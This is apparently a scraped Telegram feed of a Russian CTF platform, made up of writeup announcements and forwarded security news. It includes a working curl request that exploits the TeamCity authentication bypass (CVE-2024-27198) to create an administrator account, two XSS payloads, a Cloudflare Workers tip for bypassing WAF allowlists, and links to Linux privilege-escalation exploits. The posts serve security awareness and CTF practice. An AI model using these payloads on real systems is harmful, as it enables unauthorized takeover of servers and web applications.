TaipanByte CTF
797 subscribers
139 photos
4 videos
1 file
130 links
Time unlimited CTF platform
https://ctf.taipanbyte.ru

По любым вопросам можете обращаться сюда
@taipanbyte_support

Сайт визитка
https://taipanbyte.ru

Общаемся тут
https://discord.com/invite/StETGjUgD7

Чатик ТГ вот
https://t.iss.one/+bR83UROiHPI5MzMy
Download Telegram
🔒 Perfection HTB Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#hackthebox #writeup #easy #season4
🔥3
🔒 Легенда 60-x (Codeby) Writeup

Автор: @Vespii

🔗 Читать далее

#Codeby #writeup #OSINT #medium
🔥2
🔒 Nokia 3310 (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #easy #misc
🔥2
Forwarded from PurpleBear (Vadim Shelest)
Давно уже мы не обсуждали новые уязвимости, поэтому сегодня у нас свеженькая RCE - CVE-2024-27198 (оценка по CVSS=9.8) и path traversal - CVE-2024-27199 (оценка по CVSS=7.3) в TeamCity CI/CD от JetBrains

Думаю, что прямо из названия TeamCity CI/CD в целом уже понятно назначение данного продукта, но если нужны детали в качестве предисловия, то можно посмотреть по ссылке на прошлый обзор критичной баги в этом решении.

Позавчера в блоге Rapid7 были опубликованы технические детали эксплуатации этих уязвимостей:

CVE-2024-27198
- байпас аутентификации из-за недостатка логики проверки аутентификации для методов класса jetbrains.buildServer.controllers.BaseController библиотеки web-openapi.jar. Эксплуатация которых позволяет получить возможность доступа к приложению с правами администратора с помощью создания новой учетки или нового значения access token для существующей учетной записи. Уязвимость возникает при обращении к несуществующей странице c параметром запроса jsp=/app/rest/users;.jsp

curl -ik https://target.com/hax?jsp=/app/rest/users;.jsp -X POST -H "Content-Type: application/json" --data "{\"username\": \"haxor\", \"password\": \"haxor\", \"email\": \"haxor\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}"


CVE-2024-27199 - тоже про байпас аутентификации, но при обращении к нескольким менее критичным ручкам /res, /update, /.well-known/acme-challenge. При этом запрос с path traversal к этим эндпоинтам, на примере /res/../admin/diagnostic.jsp раскрывает некоторую информацию. А /res/../app/https/settings/uploadCertificate позволяет изменить tls сертификат и https порт веб-сервера /res/../app/https/settings/setPort.
Полный список ручек можно найти в блоге авторов.

⚙️ POC: https://github.com/yoryio/CVE-2024-27198, модуль metasploit https://github.com/rapid7/metasploit-framework/pull/18922
🔎 Sigma правила: https://github.com/rapid7/Rapid7-Labs/blob/main/Sigma/path_traversal_attacks_CVE_2024_27199.yml
🪲 Уязвимые версии ПО: TeamCity до версии 2023.11.4
Рекомендации: Патч уже доступен, необходимо обновиться до версии 2023.11.4

#TeamCity #RCE #CVE-2024-27198
2
🔒 Зашифрованный трафик (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #easy #forensic
🔥2
Forwarded from Proxy Bar
Linux Privilege Escalation Cheatsheet
пыщь
2
🔒 Книжный червь (Codeby) Writeup

Автор: @Keika_7

🔗 Читать далее

#Codeby #writeup #easy #crypto
🔥2
🔒 Кракозябры (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #crypto #easy
🔥2
🔥3
Forwarded from Proxy Bar
%3C/script%20%3E

или
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E

#xss
1
Участвуем в отборке Standoff13
🎉4
Forwarded from Волосатый бублик
#clourdflare #bypass

Сначала хотел что то написать умное, с эпитетами и красивыми речевыми оборотами, но знаю что вы все равно всю эту воду читать не будете, поэтому кратко:

Cloudflare Workers ходит в интернет с тех же IP адресов, которую часто же рекомендуют добавлять в фаерволах как разрешенные, а остальные блокировать.

Итого: Если у вас есть сайт за Cloudflare, вы точно знаете его реальный IP, но мешает вам к нему обратиться правило фаервола, смело пишите Worker. Пример есть в документации и обходите WAF-Ы, воруйте, убивайте и любите гусей!

Наверное можно было написать в Cloudflare и получить "фифти бакс, сир, плиз...", но мне лень!
1👍1🔥1
Forwarded from Proxy Bar
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-1086 Linux LPE
*
Универсальный эксплойт для повышения локальных привилегий , работающий на большинстве ядер Linux между версиями 5.14 и 6.6, Debian, Ubuntu.
*
download

#linux #lpe
1👍1🔥1
Forwarded from Proxy Bar
CVE-2024-28085 - Смешная дырка в Linux 😜
*
Дырке 11 лет, дырка есть в обновлении которое вышло 27 марта 2024 года.
Дырка проверена на Ubuntu 22.04 LTS и Debian 12.5
Но есть ньюанс, нужно уже быть на сервере.
*
В общем почитайте, поддельные sudo запросы
*
POC

#linux #sudo
👍1🔥1
🔒 Хеш-станция (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #misc #medium
🔥31👍1
🔒 ABC (Codeby) Writeup

Автор: @Vespii

🔗 Читать далее

#Codeby #writeup #crypto #easy
1👍1🔥1
🔒 Одноразовый блокнот (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #crypto #medium
❤‍🔥1👍1🔥1
🔒 Криптоинвестор (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #osint #easy
👍1🔥1🤩1